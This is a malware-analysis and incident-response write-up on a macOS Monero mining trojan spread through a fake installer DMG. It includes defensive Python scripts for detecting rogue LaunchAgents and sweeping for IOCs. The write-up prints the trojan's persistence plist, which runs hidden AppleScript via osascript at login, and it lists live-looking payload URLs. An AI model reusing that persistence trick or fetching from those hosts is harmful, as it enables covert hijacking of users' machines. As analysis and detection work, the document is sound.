Background
During a recent incident response engagement we came across a cryptomining trojan on a Mac; its sole purpose is to mine. On site it turned out that the victim had installed a third-party DMG obtained from a Mac software download site (we confirmed that a "LOL" Mac installer app, Install-LOL.app, drops the trojan). We suspect that many third-party DMGs circulating online carry the same malicious payload.
Symptoms
Affected users generally reported the following:
- High CPU usage
- System lag and freezes
- Activity Monitor will not open
- Computer overheating
Trojan infection
After a brief analysis we believe the trojan originates in the third-party installer package. During extraction and installation it drops a malicious file disguised as 11.png (the name varies) together with two launchd property lists in ~/Library/LaunchAgents/: com.apple.Yahoo.plist and com.apple.Google.plist. Apple never installs com.apple.* agents in the per-user LaunchAgents folder (its own live under /System/Library and /Library), so these labels are impersonation.
- com.apple.Google.plist is the launchd startup item, shown below. It runs osascript, which in turn runs osascript on com.apple.Yahoo.plist; despite the extension, that file is therefore an AppleScript, not a property list. RunAtLoad gives execution at every login; the StartInterval of 31104000 seconds (360 days) is cover rather than a real schedule.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key>
  <string>com.apple.Google</string>
  <key>Program</key>
  <string>/usr/bin/osascript</string>
  <key>ProgramArguments</key>
  <array>
    <string>osascript</string>
    <string>-e</string>
    <string>do shell script "osascript ~/Library/LaunchAgents/com.apple.Yahoo.plist"</string>
  </array>
  <key>RunAtLoad</key>
  <true/>
  <key>StartInterval</key>
  <integer>31104000</integer>
  <key>WatchPaths</key>
  <array/>
</dict>
</plist>
```
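The persistence above can be checked for mechanically. The following triage script is an added example written for this write-up, not code from the original analysis: it parses LaunchAgent plists with Python's plistlib and flags the traits this agent shows (an Apple label in the per-user directory, a script interpreter as the program, an AppleScript `do shell script`, a .plist path handed to osascript, and an implausibly long StartInterval). The malicious sample is a copy of the plist quoted above; the benign `com.example.updater` agent is a constructed stand-in for an ordinary vendor updater and is not from the page.

```python
import os
import plistlib
import re
import sys
from typing import List, Tuple

# Constructed sample: a copy of the com.apple.Google LaunchAgent quoted in the write-up.
MALICIOUS_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.Google</string>
  <key>Program</key><string>/usr/bin/osascript</string>
  <key>ProgramArguments</key>
  <array>
    <string>osascript</string>
    <string>-e</string>
    <string>do shell script "osascript ~/Library/LaunchAgents/com.apple.Yahoo.plist"</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>31104000</integer>
  <key>WatchPaths</key><array/>
</dict>
</plist>
"""

# Constructed benign sample (assumption: a typical vendor updater) to show the checks stay quiet on normal agents.
BENIGN_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array><string>/Applications/Example.app/Contents/MacOS/updater</string><string>--check</string></array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>3600</integer>
</dict>
</plist>
"""

# Interpreters a LaunchAgent rarely needs to invoke directly; when one does, the script it runs deserves a look.
SCRIPT_INTERPRETERS = {"osascript", "sh", "bash", "zsh", "python", "python3", "perl", "ruby", "curl"}


def analyse_launch_agent(data: bytes, per_user: bool = True) -> List[Tuple[str, str]]:
    """Return (tag, detail) findings for one launchd agent plist.

    per_user=True means the file came from ~/Library/LaunchAgents. Apple's own agents
    live under /System/Library and /Library, never there, so a com.apple.* label in the
    per-user directory is impersonation.
    """
    try:
        plist = plistlib.loads(data)
    except Exception as exc:  # not a plist at all, e.g. the AppleScript named com.apple.Yahoo.plist
        return [("unparseable", str(exc))]

    findings: List[Tuple[str, str]] = []
    label = str(plist.get("Label", ""))
    program = str(plist.get("Program", ""))
    args = [str(a) for a in plist.get("ProgramArguments", [])]
    cmdline = " ".join(args)
    executable = os.path.basename(program or (args[0] if args else ""))

    if per_user and label.startswith("com.apple."):
        findings.append(("apple_label_in_user_dir", label))
    if executable in SCRIPT_INTERPRETERS:
        findings.append(("script_interpreter", executable))
    if "do shell script" in cmdline:
        findings.append(("applescript_shell", cmdline))
    # A .plist path handed to osascript is a script wearing a property-list name.
    for target in re.findall(r"osascript\s+(\S+\.plist)", cmdline):
        findings.append(("plist_run_as_script", target))
    interval = plist.get("StartInterval")
    if isinstance(interval, int) and interval >= 30 * 86400:
        # 31104000 s is 360 days: the agent relies on RunAtLoad; the interval is cover.
        findings.append(("implausible_interval", f"{interval}s"))
    return findings


def scan_directory(directory: str, per_user: bool = True):
    """Apply the checks to every .plist in a LaunchAgents directory; yields (path, findings)."""
    for name in sorted(os.listdir(directory)):
        if name.endswith(".plist"):
            path = os.path.join(directory, name)
            with open(path, "rb") as fh:
                yield path, analyse_launch_agent(fh.read(), per_user)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else os.path.expanduser("~/Library/LaunchAgents")
    for path, findings in scan_directory(target):
        for tag, detail in findings:
            print(f"{path}: {tag}: {detail}")
```

Run it with no arguments to scan the current user's ~/Library/LaunchAgents, or pass /Library/LaunchAgents with per_user=False in code to cover system-wide agents (where a com.apple.* label is normal). A file that fails to parse is itself a finding: a LaunchAgents entry that launchd cannot load has no legitimate reason to be there.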
Execution
We also found another "PNG" file which, when run, behaves exactly like 11.png; it is an AppleScript file, not an image.
Once executed, the script contacts ondayon.com:8080 and downloads the following malicious files:
Path: under ~/Library/Safari/
- ssl.plist (the mining program)
- pools.txt
- cpu.txt
- config.txt

```text
-rw-r--r--@ 1 xxxxxx  staff  788212  8 17 16:08 ssl.plist
-rw-r--r--@ 1 xxxxxx  staff     343  8 17 16:08 config.txt
-rw-r--r--@ 1 xxxxxx  staff     229  8 17 16:08 pools.txt
-rw-r--r--@ 1 xxxxxx  staff     256  8 17 16:08 cpu.txt
```

(The mode column of both listings was mangled in the original and is shown here as the usual -rw-r--r--; the trailing @ means the files carry extended attributes, typically com.apple.quarantine on downloaded content.)

And in the matching ~/Library/Safari/openssl/lib/ directory:
- libcrypto.1.0.0.dylib
- libssl.1.0.0.dylib

```text
drwxr-xr-x@ 4 xxxxxx  staff      128  5 30 16:51 .
drwxr-xr-x@ 3 xxxxxx  staff       96  5 30 16:51 ..
-rw-r--r--@ 1 xxxxxx  staff   385152  9 29  2017 libssl.1.0.0.dylib
-rw-r--r--@ 1 xxxxxx  staff  1767648  9 29  2017 libcrypto.1.0.0.dylib
```

The dylib timestamps (29 Sep 2017) predate the infection, so the OpenSSL 1.0.0 libraries arrive prebuilt with the miner rather than being compiled on the victim.
Mining
ssl.plist is the compiled XMR (Monero) mining program; mining is all it does. The .plist name and the ~/Library/Safari location let it pass for Safari data, and the bundled libssl/libcrypto dylibs are the OpenSSL build it links against.
Response
Indicators of compromise:

IP
- 43.294.204.183 (as printed in the original; 294 is not a valid octet, so treat this address with caution)
- 45.195.146.32
- 101.55.20.149

Domain
- ondayon.com

URL
- http://ondayon.com:8080/ssl.zip
- http://101.55.20.149/ssl.zip
- http://101.55.20.149/gogoto.png
- http://101.55.20.149/8/Build.zip

Hash (SHA-256)
- 0659b79c1b1274dc1e708cae010c9a2e778a3a52a476262015a788082b22a697 (libcrypto.1.0.0.dylib)
- fde413f8f369c2ede2f0f82e0ab7fe35eb6d4c770d73a6a58ad52fd9ddd65804 (ssl.plist)
- c60e197f216fe29f1a9d0b80d0381fcebefe04b6f4d68db3255b6a002f0018c3 (libssl.1.0.0.dylib)
- f89205a8091584e1215cf33854ad764939008004a688b7e530b085e3230effce (ondayon.png)
- 5619d101a7e554c4771935eb5d992b1a686d4f80a2740e8a8bb05b03a0d6dc2b (Install-LOL.app.zip)
- 2b566d454faabb38cd5b173f9365b89bda5e88d4bfaa7dea97512cc9d89e9150 (Build.zip)
- 6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d (x.x)
- ab4596d3f8347d447051eb4e4075e04c37ce161514b4ce3fae91010aac7ae97f (com.apple.Yahoo.plist)
- 2eb531d2d00c783fb83da9e925177a6aa3f567dec7f678cbe6c30f9dfd5111e7 (com.apple.Google.plist)
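The indicators above can be swept for on a suspect machine. The script below is an added example for this write-up, not a tool from the original analysis. It checks the known drop locations by path, hashes everything under ~/Library/Safari and ~/Library/LaunchAgents against the SHA-256 list (which also catches the dropper if it was renamed, since the 11.png name varies), and emits the cleanup commands instead of running them, so the LaunchAgent can be unloaded before the files are removed. It also screens the hash list itself: the x.x hash is the SHA-256 of a single 0x00 byte, so it would match any one-byte null file and is excluded from matching. The demo builds a constructed home directory in a temp folder with stand-in files; the stand-in miner's hash is added to the IOC set at runtime because the real sample is not shipped here.

```python
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, Iterable, List, Tuple

# SHA-256 IOCs listed in the write-up (hash -> file name).
IOC_HASHES: Dict[str, str] = {
    "0659b79c1b1274dc1e708cae010c9a2e778a3a52a476262015a788082b22a697": "libcrypto.1.0.0.dylib",
    "fde413f8f369c2ede2f0f82e0ab7fe35eb6d4c770d73a6a58ad52fd9ddd65804": "ssl.plist",
    "c60e197f216fe29f1a9d0b80d0381fcebefe04b6f4d68db3255b6a002f0018c3": "libssl.1.0.0.dylib",
    "f89205a8091584e1215cf33854ad764939008004a688b7e530b085e3230effce": "ondayon.png",
    "5619d101a7e554c4771935eb5d992b1a686d4f80a2740e8a8bb05b03a0d6dc2b": "Install-LOL.app.zip",
    "2b566d454faabb38cd5b173f9365b89bda5e88d4bfaa7dea97512cc9d89e9150": "Build.zip",
    "6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d": "x.x",
    "ab4596d3f8347d447051eb4e4075e04c37ce161514b4ce3fae91010aac7ae97f": "com.apple.Yahoo.plist",
    "2eb531d2d00c783fb83da9e925177a6aa3f567dec7f678cbe6c30f9dfd5111e7": "com.apple.Google.plist",
}

# Drop locations from the write-up, relative to the victim's home directory.
IOC_PATHS = [
    "Library/Safari/ssl.plist",
    "Library/Safari/pools.txt",
    "Library/Safari/cpu.txt",
    "Library/Safari/config.txt",
    "Library/Safari/openssl/lib/libssl.1.0.0.dylib",
    "Library/Safari/openssl/lib/libcrypto.1.0.0.dylib",
    "Library/LaunchAgents/com.apple.Yahoo.plist",
    "Library/LaunchAgents/com.apple.Google.plist",
]

# Content so trivial that matching on its hash would flag benign files.
TRIVIAL_CONTENT = {
    hashlib.sha256(b"").hexdigest(): "empty file",
    hashlib.sha256(b"\x00").hexdigest(): "single NUL byte",
}

Hit = Tuple[str, str, str]  # (kind, absolute path, matched indicator)


def trivial_iocs(ioc_hashes: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (name, reason) for hashes in the IOC list that are unusable as indicators."""
    return [(name, TRIVIAL_CONTENT[h]) for h, name in ioc_hashes.items() if h in TRIVIAL_CONTENT]


def sha256_of(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def sweep(home: Path, ioc_hashes: Dict[str, str], ioc_paths: Iterable[str],
          scan_dirs: Iterable[str] = ("Library/Safari", "Library/LaunchAgents")) -> List[Hit]:
    """Path hits for known drop locations, then hash hits for any file under scan_dirs."""
    usable = {h: n for h, n in ioc_hashes.items() if h not in TRIVIAL_CONTENT}
    hits: List[Hit] = []
    for rel in ioc_paths:
        candidate = home / rel
        if candidate.is_file():
            hits.append(("path", str(candidate), rel))
    for rel in scan_dirs:
        base = home / rel
        if not base.is_dir():
            continue
        for candidate in sorted(base.rglob("*")):
            if candidate.is_file():
                digest = sha256_of(candidate)
                if digest in usable:
                    hits.append(("hash", str(candidate), usable[digest]))
    return hits


def remediation_commands(hits: List[Hit]) -> List[str]:
    """Shell commands to clean up, in order: unload LaunchAgents first, then delete files."""
    commands: List[str] = []
    seen = set()
    for _, path, _ in hits:
        if path in seen:
            continue
        seen.add(path)
        if "/LaunchAgents/" in path and path.endswith(".plist"):
            commands.append(f"launchctl unload '{path}'")
        commands.append(f"rm -f '{path}'")
    return commands


def demo() -> Tuple[List[Hit], List[str]]:
    """Constructed demo: a fake home directory with a renamed stand-in miner, one persistence plist,
    a one-byte NUL file (must not be flagged) and a benign file, swept in a temp folder."""
    with tempfile.TemporaryDirectory() as tmp:
        home = Path(tmp)
        (home / "Library/Safari/openssl/lib").mkdir(parents=True)
        (home / "Library/LaunchAgents").mkdir(parents=True)
        stand_in = home / "Library/Safari/renamed.bin"  # only the hash can catch a renamed drop
        stand_in.write_bytes(b"constructed stand-in for ssl.plist")
        (home / "Library/LaunchAgents/com.apple.Google.plist").write_bytes(b"<plist/>")
        (home / "Library/Safari/nul.bin").write_bytes(b"\x00")
        (home / "Library/Safari/Bookmarks.plist").write_bytes(b"benign")
        hashes = dict(IOC_HASHES)
        hashes[sha256_of(stand_in)] = "ssl.plist (stand-in)"
        hits = sweep(home, hashes, IOC_PATHS)
        return hits, remediation_commands(hits)


if __name__ == "__main__":
    for hit in demo()[0]:
        print(hit)
```

On a real machine call `sweep(Path.home(), IOC_HASHES, IOC_PATHS)` from a terminal that has Full Disk Access, since ~/Library/Safari is protected by TCC on current macOS. The IP, domain and URL indicators belong in proxy and DNS logs rather than on disk, and the remediation list is deliberately printed, not executed, so it can be reviewed before anything is unloaded or deleted.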
Title: A brief analysis of the Mac coin-mining Trojan